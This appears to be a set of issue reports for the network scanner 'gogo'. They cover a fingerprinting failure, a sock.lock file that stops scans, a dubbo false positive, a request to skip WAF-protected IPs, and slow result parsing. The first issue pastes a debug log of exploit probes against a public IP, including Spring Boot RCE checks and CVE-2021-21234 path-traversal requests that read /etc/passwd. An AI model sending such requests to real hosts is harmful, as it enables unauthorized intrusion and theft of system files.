Suggest not prefixing generated filenames with a dot; on macOS and Linux, dot-prefixed files are hidden automatically.

Active fingerprinting does not work


[*] gogo:=v2.12.1 , 2024-04-24 16:43.55
[*] Current goroutines: 1000, Version Level: 1,Exploit: auto, PortSpray: false , 2024-04-24 16:43.55
[*] Start task 39.98.123.211 ,total ports: 1 , mod: default , 2024-04-24 16:43.55
[*] ports: 8170 , 2024-04-24 16:43.55
[*] Default Scan is expected to take 4 seconds , 2024-04-24 16:43.55
[debug] springboot finger hit, body: "no message available"
[debug] active detect: http://39.98.123.211:8170/info
[debug] active detect: http://39.98.123.211:8170/v2/keys/
[debug] active detect: http://39.98.123.211:8170/zabbix
[debug] active detect: http://39.98.123.211:8170/nacos/
[debug] active detect: http://39.98.123.211:8170/eosmgr/eos/EventDispatcher
[debug] active detect: http://39.98.123.211:8170/console/login/LoginForm.jsp
[debug] active detect: http://39.98.123.211:8170/ueditor
[debug] active detect: http://39.98.123.211:8170/swagger-ui.html
[debug] active detect: http://39.98.123.211:8170/druid/index.html
[debug] active detect: http://39.98.123.211:8170/functionRouter
[debug] active detect: http://39.98.123.211:8170/tmui/login.jsp
[debug] active detect: http://39.98.123.211:8170/login/img/product_logo.png
[debug] active detect: http://39.98.123.211:8170/WebReport/ReportServer
[debug] active detect: http://39.98.123.211:8170/ReportServer
[debug] active detect: http://39.98.123.211:8170/webroot/ReportServer
[debug] active detect: http://39.98.123.211:8170/solr
[debug] active detect: http://39.98.123.211:8170/axis2/services/testunknown
[debug] active detect: http://39.98.123.211:8170/OAapp
[debug] active detect: http://39.98.123.211:8170/jenkins
[debug] active detect: http://39.98.123.211:8170/xxl-job-admin
[debug] active detect: http://39.98.123.211:8170/login/login.php
[debug] active detect: http://39.98.123.211:8170/poserver.zz
[debug] active detect: http://39.98.123.211:8170/emm-api
[debug] active detect: http://39.98.123.211:8170/vision/index.jsp
[debug] active detect: http://39.98.123.211:8170/smartbi/index.jsp
[debug] active detect: http://39.98.123.211:8170/smartbi/
[debug] active detect: http://39.98.123.211:8170/ht-login.jsp
[debug] request favicon http://39.98.123.211:8170/favicon.ico 200
[debug] http://39.98.123.211:8170/favicon.ico favicon 0488faca4c19046b94d07c3ee83cf9d6 116323821
[debug] neutron scan http://39.98.123.211:8170 with springboot-h2-db-rce
[debug] request POST http://39.98.123.211:8170/actuator/env map[]
[debug] neutron scan http://39.98.123.211:8170 with springboot-h2-db-rce error:
[debug] neutron scan http://39.98.123.211:8170 with springboot-actuators-jolokia-rce
[debug] request GET http://39.98.123.211:8170/jolokia/exec map[]
[debug] request GET http://39.98.123.211:8170/actuator/jolokia/exec map[]
[debug] neutron scan http://39.98.123.211:8170 with springboot-actuators-jolokia-rce error:
[debug] neutron scan http://39.98.123.211:8170 with CVE-2021-21234
[debug] request GET http://39.98.123.211:8170/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ map[]
[debug] request GET http://39.98.123.211:8170/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ map[]
[debug] request GET http://39.98.123.211:8170/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ map[]
[debug] request GET http://39.98.123.211:8170/log/view?filename=/etc/passwd&base=../../../../../../../../../../ map[]
[debug] neutron scan http://39.98.123.211:8170 with CVE-2021-21234 error:
[debug] neutron scan http://39.98.123.211:8170 with springboot-actuator
[debug] payloads: path:info
[debug] request GET http://39.98.123.211:8170/info map[path:info]
[debug] payloads: path:info
[debug] request GET http://39.98.123.211:8170/actuator/info map[path:info]
[debug] payloads: path:env
[debug] request GET http://39.98.123.211:8170/info map[path:env]
[debug] payloads: path:env
[debug] request GET http://39.98.123.211:8170/actuator/info map[path:env]
[debug] neutron scan http://39.98.123.211:8170 with springboot-actuator error:
[debug] neutron scan http://39.98.123.211:8170 with shiro-detect
[debug] request GET http://39.98.123.211:8170 map[]
[debug] neutron scan http://39.98.123.211:8170 with shiro-detect error:
[+] http://39.98.123.211:8170 focus:springboot:(finger ico) [404] HTTP/1.1 404
[*] Alived: 1, Total: 1 , 2024-04-24 16:43.59
[*] Time consuming: 3.5599506s , 2024-04-24 16:43.59

Question about the generated sock.lock file

When scanning a B-class range on the internal network, after a while a sock.lock file is generated automatically and the scan stops. I looked at the source but did not quite understand it; could you explain? Thanks.

dubbo_unauthorized false positive

Scanner output:
tcp://xx.xx.xx.xx.xx:20880 focus:dubbo-remote [tcp] Unsupported c [ high: dubbo_unauthorized ]

Verification:
Trying xx.xx.xx.xx.xx...
Connected to xx.xx.xx.xx.xx.
Escape character is '^]'.
ls
Command: ls disabled for security reasons, please enable support by listing the commands through 'telnet'

Skip WAF

Could you add a feature to skip port scanning for IPs that have a WAF?

-F struggles with large result files

7.0M scan.txt_all_default_json.dat1

gogo -F scan.txt_all_default_json.dat1 -o c takes a long time to process
Also, could -F export in ip:port form, or to an Excel spreadsheet?
